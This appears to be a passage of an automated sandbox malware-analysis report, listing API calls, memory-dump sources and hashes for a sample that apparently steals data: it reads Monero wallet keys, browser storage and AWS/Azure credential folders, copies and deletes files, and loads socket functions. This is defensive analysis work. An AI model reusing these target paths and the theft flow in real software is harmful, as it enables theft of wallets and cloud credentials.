                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006D220A
                            • lstrcat.KERNEL32(00000000,?), ref: 006D2218
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006D2242
                            • lstrcpy.KERNEL32(00000000,006FCFEC), ref: 006D227F
                            • lstrlen.KERNEL32(0101DE28), ref: 006D228D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006D22B1
                            • lstrcat.KERNEL32(00000000,0101DE28), ref: 006D22B9
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006D22F7
                            • lstrcat.KERNEL32(00000000), ref: 006D2304
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006D232D
                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 006D2356
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006D2382
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006D23BF
                            • DeleteFileA.KERNEL32(00000000), ref: 006D23F7
                            • FindNextFileA.KERNEL32(00000000,?), ref: 006D2444
                            • FindClose.KERNEL32(00000000), ref: 006D2453
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$lstrlen$File$Find$CloseCopyDeleteNext
                            • String ID:
                            • API String ID: 2857443207-0
                            • Opcode ID: 0803f39c9efbe3171160ee9e8060154d488750df4b39fcb610fc08b802be4797
                            • Instruction ID: e1fea756f717ebe1f0b1f859dcb4eccdba34e647e2ae6b91b308424d5186d550
                            • Opcode Fuzzy Hash: 0803f39c9efbe3171160ee9e8060154d488750df4b39fcb610fc08b802be4797
                            • Instruction Fuzzy Hash: B0E17D70E2121B9FCB61EF65DDA9AEE77BAAF24300F04502AF905A7311DB34DD058B94
                            APIs
                            • lstrcpy.KERNEL32(00000000,006FCFEC), ref: 006E6445
                            • lstrcpy.KERNEL32(00000000,006FCFEC), ref: 006E6480
                            • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 006E64AA
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E64E1
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E6506
                            • lstrcat.KERNEL32(00000000,00000000), ref: 006E650E
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E6537
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$FolderPathlstrcat
                            • String ID: \..\
                            • API String ID: 2938889746-4220915743
                            • Opcode ID: 672e83898708f9d6bf00be3cf20d9f8e42cc5321b8b317989e8d80cc5f1e31ca
                            • Instruction ID: f45c2f51a8b7e3f28129826e9406f239e27cc7037574173bf6a6798826c7a185
                            • Opcode Fuzzy Hash: 672e83898708f9d6bf00be3cf20d9f8e42cc5321b8b317989e8d80cc5f1e31ca
                            • Instruction Fuzzy Hash: 3FF1CF70E223569FCB61EF6AD859AAE77B6AF20340F048029F845DB361DB34DC41CB94
                            APIs
                            • lstrcpy.KERNEL32(00000000,006FCFEC), ref: 006E43A3
                            • lstrcpy.KERNEL32(00000000,006FCFEC), ref: 006E43D6
                            • lstrcpy.KERNEL32(00000000,?), ref: 006E43FE
                            • lstrcat.KERNEL32(00000000,00000000), ref: 006E4409
                            • lstrlen.KERNEL32(\storage\default\), ref: 006E4414
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E4431
                            • lstrcat.KERNEL32(00000000,\storage\default\), ref: 006E443D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E4466
                            • lstrcat.KERNEL32(00000000,00000000), ref: 006E4471
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E4498
                            • lstrcpy.KERNEL32(00000000,?), ref: 006E44D7
                            • lstrcat.KERNEL32(00000000,?), ref: 006E44DF
                            • lstrlen.KERNEL32(00701794), ref: 006E44EA
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E4507
                            • lstrcat.KERNEL32(00000000,00701794), ref: 006E4513
                            • lstrlen.KERNEL32(.metadata-v2), ref: 006E451E
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E453B
                            • lstrcat.KERNEL32(00000000,.metadata-v2), ref: 006E4547
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E456E
                            • lstrcpy.KERNEL32(00000000,?), ref: 006E45A0
                            • GetFileAttributesA.KERNEL32(00000000), ref: 006E45A7
                            • lstrcpy.KERNEL32(00000000,?), ref: 006E4601
                            • lstrcpy.KERNEL32(00000000,?), ref: 006E462A
                            • lstrcpy.KERNEL32(00000000,?), ref: 006E4653
                            • lstrcpy.KERNEL32(00000000,?), ref: 006E467B
                            • lstrcpy.KERNEL32(00000000,006FCFEC), ref: 006E46AF
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$lstrlen$AttributesFile
                            • String ID: .metadata-v2$\storage\default\
                            • API String ID: 1033685851-762053450
                            • Opcode ID: fdb790b6de6f7cf4402e51f4befe699e374b13cbbb0e593fc482b5bffd59537a
                            • Instruction ID: a87bbecfc75ad2bf0df81cf8b56a3a0a23a9a913cc868d9bed42e0f6b2cdb59a
                            • Opcode Fuzzy Hash: fdb790b6de6f7cf4402e51f4befe699e374b13cbbb0e593fc482b5bffd59537a
                            • Instruction Fuzzy Hash: F0B18970A222569FCB61EF7AD959AAE77AAAF10300F045129B846E7352DF34DC018B94
                            APIs
                            • lstrcpy.KERNEL32(00000000,006FCFEC), ref: 006E57D5
                            • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 006E5804
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E5835
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E585D
                            • lstrcat.KERNEL32(00000000,00000000), ref: 006E5868
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E5890
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E58C8
                            • lstrcat.KERNEL32(00000000,00000000), ref: 006E58D3
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E58F8
                            • lstrcpy.KERNEL32(00000000,006FCFEC), ref: 006E592E
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E5956
                            • lstrcat.KERNEL32(00000000,00000000), ref: 006E5961
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E5988
                            • lstrlen.KERNEL32(00701794), ref: 006E599A
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E59B9
                            • lstrcat.KERNEL32(00000000,00701794), ref: 006E59C5
                            • lstrlen.KERNEL32(0101DC48), ref: 006E59D4
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E59F7
                            • lstrcat.KERNEL32(00000000,00000000), ref: 006E5A02
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E5A2C
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E5A58
                            • GetFileAttributesA.KERNEL32(00000000), ref: 006E5A5F
                            • lstrcpy.KERNEL32(00000000,?), ref: 006E5AB7
                            • lstrcpy.KERNEL32(00000000,?), ref: 006E5B2D
                            • lstrcpy.KERNEL32(00000000,?), ref: 006E5B56
                            • lstrcpy.KERNEL32(00000000,?), ref: 006E5B89
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E5BB5
                            • lstrcpy.KERNEL32(00000000,006FCFEC), ref: 006E5BEF
                            • lstrcpy.KERNEL32(00000000,?), ref: 006E5C4C
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E5C70
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$lstrlen$AttributesFileFolderPath
                            • String ID:
                            • API String ID: 2428362635-0
                            • Opcode ID: b1c196c96a3e111257c0aea7fbdfd3da287e5ed9feb6e7eb234264d0bc2ae9e0
                            • Instruction ID: 3a6c2f0dbb026b18ae26d5f80bd814fd647e577c14103a76d9842cd9125125ae
                            • Opcode Fuzzy Hash: b1c196c96a3e111257c0aea7fbdfd3da287e5ed9feb6e7eb234264d0bc2ae9e0
                            • Instruction Fuzzy Hash: 2C02DE70E1275A9FCB61EF6AC899AEE7BBAAF14304F144129F80697351DB30DC41CB94
                            APIs
                              • Part of subcall function 006D1120: GetProcessHeap.KERNEL32(00000000,00000104), ref: 006D1135
                              • Part of subcall function 006D1120: RtlAllocateHeap.NTDLL(00000000), ref: 006D113C
                              • Part of subcall function 006D1120: RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,?), ref: 006D1159
                              • Part of subcall function 006D1120: RegQueryValueExA.ADVAPI32(?,wallet_path,00000000,00000000,00000000,000000FF), ref: 006D1173
                              • Part of subcall function 006D1120: RegCloseKey.ADVAPI32(?), ref: 006D117D
                            • lstrcat.KERNEL32(?,00000000), ref: 006D11C0
                            • lstrlen.KERNEL32(?), ref: 006D11CD
                            • lstrcat.KERNEL32(?,.keys), ref: 006D11E8
                            • lstrcpy.KERNEL32(00000000,006FCFEC), ref: 006D121F
                            • lstrlen.KERNEL32(010188F8), ref: 006D122D
                            • lstrcpy.KERNEL32(00000000,?), ref: 006D1251
                            • lstrcat.KERNEL32(00000000,010188F8), ref: 006D1259
                            • lstrlen.KERNEL32(\Monero\wallet.keys), ref: 006D1264
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006D1288
                            • lstrcat.KERNEL32(00000000,\Monero\wallet.keys), ref: 006D1294
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006D12BA
                            • lstrcpy.KERNEL32(00000000,006FCFEC), ref: 006D12FF
                            • lstrlen.KERNEL32(0101DE28), ref: 006D130E
                            • lstrcpy.KERNEL32(00000000,?), ref: 006D1335
                            • lstrcat.KERNEL32(00000000,?), ref: 006D133D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006D1378
                            • lstrcat.KERNEL32(00000000), ref: 006D1385
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006D13AC
                            • CopyFileA.KERNEL32(?,?,00000001), ref: 006D13D5
                            • lstrcpy.KERNEL32(00000000,?), ref: 006D1401
                            • lstrcpy.KERNEL32(00000000,?), ref: 006D143D
                              • Part of subcall function 006EEDE0: lstrcpy.KERNEL32(00000000,?), ref: 006EEE12
                            • DeleteFileA.KERNEL32(?), ref: 006D1471
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$lstrlen$FileHeap$AllocateCloseCopyDeleteOpenProcessQueryValue
                            • String ID: .keys$\Monero\wallet.keys
                            • API String ID: 2881711868-3586502688
                            • Opcode ID: 47701ffa09054b7cbaee240e9a095c015be7bee734ec0827a2f6e27701791163
                            • Instruction ID: 3425989456cfea191fdf73a808b08ce188aeffbfc268e5f6612a0d98380472b7
                            • Opcode Fuzzy Hash: 47701ffa09054b7cbaee240e9a095c015be7bee734ec0827a2f6e27701791163
                            • Instruction Fuzzy Hash: ACA1B271E10216ABCB61EFB5DC99AEE77BAAF15300F04402AF905EB351DB70DE418B94
                            APIs
                            • memset.MSVCRT ref: 006EE740
                            • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 006EE769
                            • lstrcpy.KERNEL32(00000000,?), ref: 006EE79F
                            • lstrcat.KERNEL32(?,00000000), ref: 006EE7AD
                            • lstrcat.KERNEL32(?,\.azure\), ref: 006EE7C6
                            • memset.MSVCRT ref: 006EE805
                            • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 006EE82D
                            • lstrcpy.KERNEL32(00000000,?), ref: 006EE85F
                            • lstrcat.KERNEL32(?,00000000), ref: 006EE86D
                            • lstrcat.KERNEL32(?,\.aws\), ref: 006EE886
                            • memset.MSVCRT ref: 006EE8C5
                            • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 006EE8F1
                            • lstrcpy.KERNEL32(00000000,?), ref: 006EE920
                            • lstrcat.KERNEL32(?,00000000), ref: 006EE92E
                            • lstrcat.KERNEL32(?,\.IdentityService\), ref: 006EE947
                            • memset.MSVCRT ref: 006EE986
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$memset$FolderPathlstrcpy
                            • String ID: *.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                            • API String ID: 4067350539-3645552435
                            • Opcode ID: 3d1c716c505dc0ca144a794ded24cf6dd70422193fc574e59b8c2c69c69093df
                            • Instruction ID: d4dea34db75709eaa8599f8f3d6f36cb13c276d86e21a96a10b78cc8c91e0294
                            • Opcode Fuzzy Hash: 3d1c716c505dc0ca144a794ded24cf6dd70422193fc574e59b8c2c69c69093df
                            • Instruction Fuzzy Hash: D8712AB1E50229AFDB61EB64DC46FED7375EF58300F040499B7199B2C1DEB0AE448B58
                            APIs
                            • lstrcpy.KERNEL32 ref: 006EABCF
                            • lstrlen.KERNEL32(0101F2C8), ref: 006EABE5
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006EAC0D
                            • lstrcat.KERNEL32(00000000,00000000), ref: 006EAC18
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006EAC41
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006EAC84
                            • lstrcat.KERNEL32(00000000,00000000), ref: 006EAC8E
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006EACB7
                            • lstrlen.KERNEL32(00704AD4), ref: 006EACD1
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006EACF3
                            • lstrcat.KERNEL32(00000000,00704AD4), ref: 006EACFF
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006EAD28
                            • lstrlen.KERNEL32(00704AD4), ref: 006EAD3A
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006EAD5C
                            • lstrcat.KERNEL32(00000000,00704AD4), ref: 006EAD68
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006EAD91
                            • lstrlen.KERNEL32(0101F118), ref: 006EADA7
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006EADCF
                            • lstrcat.KERNEL32(00000000,00000000), ref: 006EADDA
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006EAE03
                            • lstrcpy.KERNEL32(00000000,?), ref: 006EAE3F
                            • lstrcat.KERNEL32(00000000,00000000), ref: 006EAE49
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006EAE6F
                            • lstrlen.KERNEL32(00000000), ref: 006EAE85
                            • lstrcpy.KERNEL32(00000000,0101F130), ref: 006EAEB8
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$lstrlen
                            • String ID: f
                            • API String ID: 2762123234-1993550816
                            • Opcode ID: 42701d64c2498f63e4ce7ff56f4f5500dc8ed560374f93b79b86043580338e43
                            • Instruction ID: 5df742400a745c4e506bebe1b8cd6c34389e897f29fb22344ddd4882be2965f5
                            • Opcode Fuzzy Hash: 42701d64c2498f63e4ce7ff56f4f5500dc8ed560374f93b79b86043580338e43
                            • Instruction Fuzzy Hash: 5CB16E70A266279FCB61EBA6CC586AFB7BBEF10300F044529B40597361DB34ED01DB95
                            APIs
                            • LoadLibraryA.KERNEL32(ws2_32.dll,?,006E72A4), ref: 006F47E6
                            • GetProcAddress.KERNEL32(00000000,connect), ref: 006F47FC
                            • GetProcAddress.KERNEL32(00000000,WSAStartup), ref: 006F480D
                            • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 006F481E
                            • GetProcAddress.KERNEL32(00000000,htons), ref: 006F482F
                            • GetProcAddress.KERNEL32(00000000,WSACleanup), ref: 006F4840
                            • GetProcAddress.KERNEL32(00000000,recv), ref: 006F4851
                            • GetProcAddress.KERNEL32(00000000,socket), ref: 006F4862
                            • GetProcAddress.KERNEL32(00000000,freeaddrinfo), ref: 006F4873
                            • GetProcAddress.KERNEL32(00000000,closesocket), ref: 006F4884
                            • GetProcAddress.KERNEL32(00000000,send), ref: 006F4895
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmp
